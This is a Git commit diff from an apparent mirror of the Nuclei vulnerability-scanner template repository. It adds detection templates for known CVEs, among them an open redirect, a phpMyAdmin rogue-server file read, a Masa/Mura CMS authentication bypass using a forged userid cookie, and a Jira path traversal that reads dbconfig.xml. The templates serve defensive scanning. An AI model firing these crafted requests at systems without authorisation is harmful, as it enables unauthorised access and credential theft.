daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'main' into dashboard

patch-1
MostInterestingBotInTheWorld 2023-03-17 11:24:28 -04:00 committed by GitHub
parent e9bd5315d7 b48d716911
commit 7677e07dec
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
756 changed files with 3284 additions and 1564 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
.github/workflows/cve2json.yml vendored
View File

@ -6,6 +6,7 @@ on:
- main
paths:
- 'cves/**'
workflow_dispatch: # allows manual triggering of the workflow
jobs:
cve2json:
@ -18,16 +19,17 @@ jobs:
go-version: 1.19
check-latest: true
- name: run yaml2json.go to generate cves.json
- name: Run yaml2json.go to generate cves.json
run: |
go env -w GO111MODULE=off
go get gopkg.in/yaml.v3
go run .github/scripts/yaml2json.go $GITHUB_WORKSPACE/cves/ cves.json
md5sum cves.json | cut -d' ' -f1 > cves.json-checksum.txt
- name: Commit files
run: |
git pull
git add cves.json
git add cves.json cves.json-checksum.txt
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git commit -m "Auto Generated cves.json [$(date)] :robot:" -a

25
.new-additions
View File

@ -1,3 +1,14 @@
cves/2015/CVE-2015-2863.yaml
cves/2017/CVE-2017-14524.yaml
cves/2019/CVE-2019-6799.yaml
cves/2022/CVE-2022-47002.yaml
cves/2022/CVE-2022-47003.yaml
cves/2023/CVE-2023-26255.yaml
cves/2023/CVE-2023-26256.yaml
default-logins/magnolia-default-login.yaml
exposed-panels/magnolia-panel.yaml
exposed-panels/veriz0wn-osint.yaml
exposures/files/reactapp-env-js.yaml
exposures/tokens/adobe/adobe-oauth-secret.yaml
exposures/tokens/age/age-public-key.yaml
exposures/tokens/age/age-secret-key.yaml
@ -38,3 +49,17 @@ exposures/tokens/square/square-oauth-secret-token.yaml
exposures/tokens/stackhawk/stackhawk-api.yaml
exposures/tokens/telegram/telegram-bot-token.yaml
exposures/tokens/twilio/twilio-api-key.yaml
file/audit/pfsense/set-hostname.yaml
file/js/js-analyse.yaml
misconfiguration/apache/apache-nifi-unauth.yaml
misconfiguration/everything-listing.yaml
misconfiguration/installer/magnolia-installer.yaml
osint/couchsurfing.yaml
ssl/revoked-ssl-certificate.yaml
technologies/nacos-version.yaml
vulnerabilities/other/brightsign-dsdws-ssrf.yaml
vulnerabilities/php/php-xdebug-rce.yaml
vulnerabilities/phpmyadmin-unauth.yaml
vulnerabilities/ueditor/ueditor-ssrf.yaml
vulnerabilities/ueditor/ueditor-xss.yaml
"\342\200\216\342\200\216misconfiguration/laravel-debug-infoleak.yaml"

3
.nuclei-ignore
View File

@ -33,7 +33,6 @@ files:
- cves/2020/CVE-2020-2036.yaml
- cves/2020/CVE-2020-28351.yaml
- cves/2021/CVE-2021-35265.yaml
- vulnerabilities/generic/basic-xss-prober.yaml
- vulnerabilities/oracle/oracle-ebs-xss.yaml
- vulnerabilities/other/nginx-module-vts-xss.yaml
- exposures/files/svn-wc-db.yaml
- cves/2006/CVE-2006-1681.yaml # https://github.com/projectdiscovery/nuclei-templates/pull/6914

6
cnvd/2021/CNVD-2021-10543.yaml
View File

@ -4,12 +4,12 @@ info:
name: EEA - Information Disclosure
author: pikpikcu
severity: high
description: EEA is susceptible to information disclosure.
description: EEA is susceptible to information disclosure including the username and password.
reference:
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-200
tags: config,exposure,cnvd,cnvd2021

7
cves.json
View File

@ -255,6 +255,7 @@
{"ID":"CVE-2015-2166","Info":{"Name":"Ericsson Drutt MSDP - Local File Inclusion","Severity":"high","Description":"Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-2166.yaml"}
{"ID":"CVE-2015-2755","Info":{"Name":"AB Google Map Travel (AB-MAP) Wordpress Plugin \u003c=3.4 - Stored XSS","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in the AB Google Map Travel (AB-MAP) plugin before 4.0 for WordPress allow remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting (XSS) attacks via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameter in the ab_map_options page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-2755.yaml"}
{"ID":"CVE-2015-2807","Info":{"Name":"Navis DocumentCloud \u003c0.1.1 - Cross-Site Scripting","Severity":"medium","Description":"Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-2807.yaml"}
{"ID":"CVE-2015-2863","Info":{"Name":"Kaseya Virtual System Administrator - Open Redirect","Severity":"low","Description":"Open redirect vulnerability in Kaseya Virtual System Administrator (VSA) 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2015/CVE-2015-2863.yaml"}
{"ID":"CVE-2015-2996","Info":{"Name":"SysAid Help Desk \u003c15.2 - Local File Disclosure","Severity":"high","Description":"Multiple directory traversal vulnerabilities in SysAid Help Desk before 15.2 allow remote attackers to (1) read arbitrary files via a .. (dot dot) in the fileName parameter to getGfiUpgradeFile or (2) cause a denial of service (CPU and memory consumption) via a .. (dot dot) in the fileName parameter to calculateRdsFileChecksum.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2015/CVE-2015-2996.yaml"}
{"ID":"CVE-2015-3035","Info":{"Name":"TP-LINK - Local File Inclusion","Severity":"high","Description":"TP-LINK is susceptible to local file inclusion in these products: Archer C5 (1.2) with firmware before 150317, Archer C7 (2.0) with firmware before 150304, and C8 (1.0) with firmware before 150316, Archer C9 (1.0), TL-WDR3500 (1.0), TL-WDR3600 (1.0), and TL-WDR4300 (1.0) with firmware before 150302, TL-WR740N (5.0) and TL-WR741ND (5.0) with firmware before 150312, and TL-WR841N (9.0), TL-WR841N (10.0), TL-WR841ND (9.0), and TL-WR841ND (10.0) with firmware before 150310. Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2015/CVE-2015-3035.yaml"}
{"ID":"CVE-2015-3224","Info":{"Name":"Ruby on Rails Web Console - Remote Code Execution","Severity":"critical","Description":"Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-3224.yaml"}
@ -371,6 +372,7 @@
{"ID":"CVE-2017-12794","Info":{"Name":"Django Debug Page - Cross-Site Scripting","Severity":"medium","Description":"Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with \"DEBUG = True\" is not on by default (which is what makes the page visible).\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-12794.yaml"}
{"ID":"CVE-2017-14135","Info":{"Name":"OpenDreambox 2.0.0 - Remote Code Execution","Severity":"critical","Description":"OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-14135.yaml"}
{"ID":"CVE-2017-14186","Info":{"Name":"FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting","Severity":"medium","Description":"FortiGate FortiOS through SSL VPN Web Portal contains a cross-site scripting vulnerability. The login redir parameter is not sanitized, so an attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks such as a URL redirect. Affected versions are 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and below.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2017/CVE-2017-14186.yaml"}
{"ID":"CVE-2017-14524","Info":{"Name":"OpenText Documentum Administrator 7.2.0180.0055 - Open redirect","Severity":"medium","Description":"Multiple open redirect vulnerabilities in OpenText Documentum Administrator 7.2.0180.0055 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-14524.yaml"}
{"ID":"CVE-2017-14535","Info":{"Name":"Trixbox - 2.8.0.4 OS Command Injection","Severity":"high","Description":"Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2017/CVE-2017-14535.yaml"}
{"ID":"CVE-2017-14537","Info":{"Name":"Trixbox 2.8.0 - Path Traversal","Severity":"medium","Description":"Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2017/CVE-2017-14537.yaml"}
{"ID":"CVE-2017-14622","Info":{"Name":"2kb Amazon Affiliates Store plugin \u003c 2.1.1 - Reflected Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting (XSS) vulnerabilities in the 2kb Amazon Affiliates Store plugin before 2.1.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) page parameter or (2) kbAction parameter in the kbAmz page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-14622.yaml"}
@ -679,6 +681,7 @@
{"ID":"CVE-2019-6112","Info":{"Name":"WordPress Sell Media 2.4.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Plugin Sell Media v2.4.1 contains a cross-site scripting vulnerability in /inc/class-search.php that allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field).","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-6112.yaml"}
{"ID":"CVE-2019-6340","Info":{"Name":"Drupal - Remote Code Execution","Severity":"high","Description":"Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10 V contain certain field types that do not properly sanitize data from non-form sources, which can lead to arbitrary PHP code execution in some cases.","Classification":{"CVSSScore":"8.1"}},"file_path":"cves/2019/CVE-2019-6340.yaml"}
{"ID":"CVE-2019-6715","Info":{"Name":"W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal","Severity":"high","Description":"WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-6715.yaml"}
{"ID":"CVE-2019-6799","Info":{"Name":"CVE-2019-6799","Severity":"high","Description":"An issue was discovered in phpMyAdmin before 4.8.5. When the AllowArbitraryServer configuration setting is set to true, with the use of a rogue MySQL server, an attacker can read any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of \"options(MYSQLI_OPT_LOCAL_INFILE\" calls.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2019/CVE-2019-6799.yaml"}
{"ID":"CVE-2019-6802","Info":{"Name":"Pypiserver 1.2.5 - CRLF Injection","Severity":"medium","Description":"CRLF Injection in pypiserver 1.2.5 and below allows attackers to set arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-6802.yaml"}
{"ID":"CVE-2019-7219","Info":{"Name":"Zarafa WebApp \u003c=2.0.1.47791 - Cross-Site Scripting","Severity":"medium","Description":"Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-7219.yaml"}
{"ID":"CVE-2019-7238","Info":{"Name":"Sonatype Nexus Repository Manager \u003c3.15.0 - Remote Code Execution","Severity":"critical","Description":"Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-7238.yaml"}
@ -1614,6 +1617,8 @@
{"ID":"CVE-2022-46169","Info":{"Name":"Cacti \u003c= 1.2.22 Unauthenticated Command Injection","Severity":"critical","Description":"The vulnerability allows a remote attacker to compromise the affected system. The vulnerability exists due to insufficient authorization within the Remote Agent when handling HTTP requests with a custom Forwarded-For HTTP header. A remote non-authenticated attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-46169.yaml"}
{"ID":"CVE-2022-46381","Info":{"Name":"Linear eMerge E3-Series - Cross-Site Scripting","Severity":"medium","Description":"Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-46381.yaml"}
{"ID":"CVE-2022-46888","Info":{"Name":"NexusPHP - Cross-Site Scripting","Severity":"medium","Description":"NexusPHPbefore 1.7.33 allow remote attackers to inject arbitrary web script or HTML via the secret parameter in /login.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-46888.yaml"}
{"ID":"CVE-2022-47002","Info":{"Name":"Masa CMS - Authentication Bypass","Severity":"critical","Description":"A vulnerability in the Remember Me function of Masa CMS v7.2, 7.3, and 7.4-beta allows attackers to bypass authentication via a crafted web request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-47002.yaml"}
{"ID":"CVE-2022-47003","Info":{"Name":"Mura CMS - Authentication Bypass","Severity":"critical","Description":"A vulnerability in the Remember Me function of Mura CMS before v10.0.580 allows attackers to bypass authentication via a crafted web request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-47003.yaml"}
{"ID":"CVE-2022-47945","Info":{"Name":"Thinkphp Lang - Local File Inclusion","Severity":"critical","Description":"ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-47945.yaml"}
{"ID":"CVE-2022-47966","Info":{"Name":"ManageEngine - Remote Command Execution","Severity":"critical","Description":"Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-47966.yaml"}
{"ID":"CVE-2022-47986","Info":{"Name":"Pre-Auth RCE in Aspera Faspex","Severity":"critical","Description":"IBM Aspera Faspex could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-47986.yaml"}
@ -1626,3 +1631,5 @@
{"ID":"CVE-2023-23752","Info":{"Name":"Joomla Improper AccessCheck in WebService Endpoint","Severity":"medium","Description":"An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2023/CVE-2023-23752.yaml"}
{"ID":"CVE-2023-24044","Info":{"Name":"Plesk Obsidian - Host Header Injection","Severity":"medium","Description":"A Host Header Injection issue on the Login page of Plesk Obsidian through 18.0.49 allows attackers to redirect users to malicious websites via a Host request header.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2023/CVE-2023-24044.yaml"}
{"ID":"CVE-2023-24322","Info":{"Name":"mojoPortal - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in the FileDialog.aspx component of mojoPortal v2.7.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2023/CVE-2023-24322.yaml"}
{"ID":"CVE-2023-26255","Info":{"Name":"STAGIL Navigation for Jira - Menu \u0026 Themes - Local File Inclusion","Severity":"high","Description":"An unauthenticated path traversal vulnerability affects the \"STAGIL Navigation for Jira - Menu \u0026 Themes\" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjCustomDesignConfig endpoint, it is possible to traverse and read the file system.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2023/CVE-2023-26255.yaml"}
{"ID":"CVE-2023-26256","Info":{"Name":"STAGIL Navigation for Jira - Menu \u0026 Themes - Local File Inclusion","Severity":"high","Description":"An unauthenticated path traversal vulnerability affects the \"STAGIL Navigation for Jira - Menu \u0026 Themes\" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjFooterNavigationConfig endpoint, it is possible to traverse and read the file system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2023/CVE-2023-26256.yaml"}

1
cves.json-checksum.txt Normal file
View File

@ -0,0 +1 @@
20c79240d730d56503179dda7a411392

31
cves/2015/CVE-2015-2863.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2015-2863
info:
name: Kaseya Virtual System Administrator - Open Redirect
author: 0x_Akoko
severity: low
description: |
Open redirect vulnerability in Kaseya Virtual System Administrator (VSA) 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
reference:
- https://github.com/pedrib/PoC/blob/3f927b957b86a91ce65b017c4b9c93d05e241592/advisories/Kaseya/kaseya-vsa-vuln.txt
- https://www.cvedetails.com/cve/CVE-2015-2863
- http://www.kb.cert.org/vuls/id/919604
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2015-2863
cwe-id: CWE-601
tags: cve,cve2015,redirect,kaseya
requests:
- method: GET
path:
- '{{BaseURL}}/inc/supportLoad.asp?urlToLoad=http://oast.me'
- '{{BaseURL}}/vsaPres/Web20/core/LocalProxy.ashx?url=http://oast.me'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

31
cves/2017/CVE-2017-14524.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2017-14524
info:
name: OpenText Documentum Administrator 7.2.0180.0055 - Open redirect
author: 0x_Akoko
severity: medium
description: |
Multiple open redirect vulnerabilities in OpenText Documentum Administrator 7.2.0180.0055 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks.
reference:
- https://seclists.org/fulldisclosure/2017/Sep/57
- https://nvd.nist.gov/vuln/detail/CVE-2017-14524
- https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774
- http://seclists.org/fulldisclosure/2017/Sep/57
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-14524
cwe-id: CWE-601
tags: cve,cve2017,redirect,opentext,seclists
requests:
- method: GET
path:
- '{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$'

90
cves/2019/CVE-2019-6799.yaml Normal file
View File

@ -0,0 +1,90 @@
id: CVE-2019-6799
info:
name: CVE-2019-6799
author: pwnhxl
severity: high
description: |
An issue was discovered in phpMyAdmin before 4.8.5. When the AllowArbitraryServer configuration setting is set to true, with the use of a rogue MySQL server, an attacker can read any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of "options(MYSQLI_OPT_LOCAL_INFILE" calls.
reference:
- https://paper.seebug.org/1112/#_4
- https://github.com/phpmyadmin/phpmyadmin/commit/828f740158e7bf14aa4a7473c5968d06364e03a2
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6799
- https://nvd.nist.gov/vuln/detail/CVE-2019-6799
- https://github.com/rmb122/rogue_mysql_server
- https://github.com/vulnspy/phpmyadmin-4.8.4-allowarbitraryserver
metadata:
verified: "true"
shodan-query: title:"phpmyadmin"
hunter-query: app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4"
fofa-query: body="pma_servername" && body="4.8.4"
tags: cve,cve2019,phpmyadmin,mysql,fileread
requests:
- raw:
- |
GET {{path}}?pma_servername={{interactsh-url}}&pma_username={{randstr}}&pma_password={{randstr}}&server=1 HTTP/1.1
Host: {{Hostname}}
payloads:
path:
- "/index.php"
- "/pma/index.php"
- "/pmd/index.php"
- "/phpMyAdmin/index.php"
- "/phpmyadmin/index.php"
- "/_phpmyadmin/index.php"
attack: batteringram
extractors:
- type: regex
name: version
internal: true
group: 1
regex:
- '\?v=([0-9.]+)'
- type: regex
group: 1
regex:
- '\?v=([0-9.]+)'
- type: regex
name: phpversion
part: header
internal: true
group: 1
regex:
- "X-Powered-By: PHP/([0-9.]+)"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
words:
- "mysqli_real_connect"
- type: word
words:
- "pma_servername"
- type: dsl
dsl:
- compare_versions(version, '< 4.8.5')
- type: dsl
dsl:
- compare_versions(version, '> 3.9.9')
- type: dsl
dsl:
- compare_versions(phpversion, '< 7.3.4')
- type: status
status:
- 200

4
cves/2022/CVE-2022-31474.yaml
View File

@ -12,10 +12,10 @@ info:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31474
remediation: Upgrade to at least version 8.7.5 or higher
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
cve-id: CVE-2022-31474
cwe-id: CWE-22
tags: cve,cve2022,wordpress,wp-plugin,wp,lfi,backupbuddy
requests:

3
cves/2022/CVE-2022-45362.yaml
View File

@ -5,7 +5,7 @@ info:
author: theamanrawat
severity: high
description: |
Server Side Request Forgery (SSRF) vulnerability in WordPress Paytm Payment Gateway Plugin. This could allow a malicious actor to cause a website to execute website requests to an arbitrary domain of the attacker. This could allow a malicious actor to find sensitive information.
Server Side Request Forgery (SSRF) vulnerability in WordPress Paytm Payment Gateway Plugin. This could allow a malicious actor to cause a website to execute website requests to an arbitrary domain of the attacker. This could allow a malicious actor to find sensitive information.
reference:
- https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-0-server-side-request-forgery-ssrf-vulnerability
- https://wordpress.org/plugins/paytm-payments/
@ -24,6 +24,7 @@ requests:
GET /?paytm_action=curltest&url={{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol

69
cves/2022/CVE-2022-47002.yaml Normal file
View File

@ -0,0 +1,69 @@
id: CVE-2022-47002
info:
name: Masa CMS - Authentication Bypass
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
A vulnerability in the Remember Me function of Masa CMS v7.2, 7.3, and 7.4-beta allows attackers to bypass authentication via a crafted web request.
reference:
- https://hoyahaxa.blogspot.com/2023/03/authentication-bypass-mura-masa.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-47002
- https://github.com/MasaCMS/MasaCMS/releases/tag/7.3.10
- https://hoyahaxa.blogspot.com/2023/01/preliminary-security-advisory.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-47002
cwe-id: CWE-863
metadata:
shodan-query: 'Generator: Masa CMS'
verified: "true"
tags: cve,cve2022,auth-bypass,cms,masa
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1
Host: {{Hostname}}
- |
GET /admin/?muraAction=cEditProfile.edit HTTP/1.1
Host: {{Hostname}}
Cookie: userid={{uuid}}; userhash=
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: dsl
condition: and
dsl:
- 'contains(body_3,"\"userid\"")'
- type: word
part: body_3
words:
- "Edit Profile"
extractors:
- type: regex
part: body
name: siteid
group: 1
internal: true
regex:
- 'siteid:"(.*?)"'
- type: regex
part: body
name: uuid
group: 1
internal: true
regex:
- '"lastupdatebyid":"([A-F0-9-]+)"'

69
cves/2022/CVE-2022-47003.yaml Normal file
View File

@ -0,0 +1,69 @@
id: CVE-2022-47003
info:
name: Mura CMS - Authentication Bypass
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
A vulnerability in the Remember Me function of Mura CMS before v10.0.580 allows attackers to bypass authentication via a crafted web request.
reference:
- https://hoyahaxa.blogspot.com/2023/03/authentication-bypass-mura-masa.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-47003
- http://mura.com
- https://www.murasoftware.com/mura-cms/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-47003
cwe-id: CWE-863
metadata:
shodan-query: 'Generator: Musa CMS'
verified: "true"
tags: cve,cve2022,auth-bypass,cms,mura
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1
Host: {{Hostname}}
- |
GET /admin/?muraAction=cEditProfile.edit HTTP/1.1
Host: {{Hostname}}
Cookie: userid={{uuid}}; userhash=
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: dsl
condition: and
dsl:
- 'contains(body_3,"\"userid\"")'
- type: word
part: body_3
words:
- "Edit Profile"
extractors:
- type: regex
part: body
name: siteid
group: 1
internal: true
regex:
- 'siteid:"(.*?)"'
- type: regex
part: body
name: uuid
group: 1
internal: true
regex:
- '"lastupdatebyid":"([A-F0-9-]+)"'

41
cves/2023/CVE-2023-26255.yaml Normal file
View File

@ -0,0 +1,41 @@
id: CVE-2023-26255
info:
name: STAGIL Navigation for Jira - Menu & Themes - Local File Inclusion
author: DhiyaneshDK
severity: high
description: |
An unauthenticated path traversal vulnerability affects the "STAGIL Navigation for Jira - Menu & Themes" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjCustomDesignConfig endpoint, it is possible to traverse and read the file system.
reference:
- https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26255.md
- https://nvd.nist.gov/vuln/detail/CVE-2023-26255
- https://marketplace.atlassian.com/apps/1216090/stagil-navigation-for-jira-menus-themes?tab=overview&hosting=cloud
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-26255
cwe-id: CWE-22
metadata:
shodan-query: title:Jira
tags: cve,cve2023,lfi,jira,cms,atlassian
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<jira-database-config>"
- type: word
part: header
words:
- '$textMime'
- type: status
status:
- 200

40
cves/2023/CVE-2023-26256.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2023-26256
info:
name: STAGIL Navigation for Jira - Menu & Themes - Local File Inclusion
author: pikpikcu
severity: high
description: |
An unauthenticated path traversal vulnerability affects the "STAGIL Navigation for Jira - Menu & Themes" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjFooterNavigationConfig endpoint, it is possible to traverse and read the file system.
reference:
- https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26256.md
- https://nvd.nist.gov/vuln/detail/CVE-2023-26256
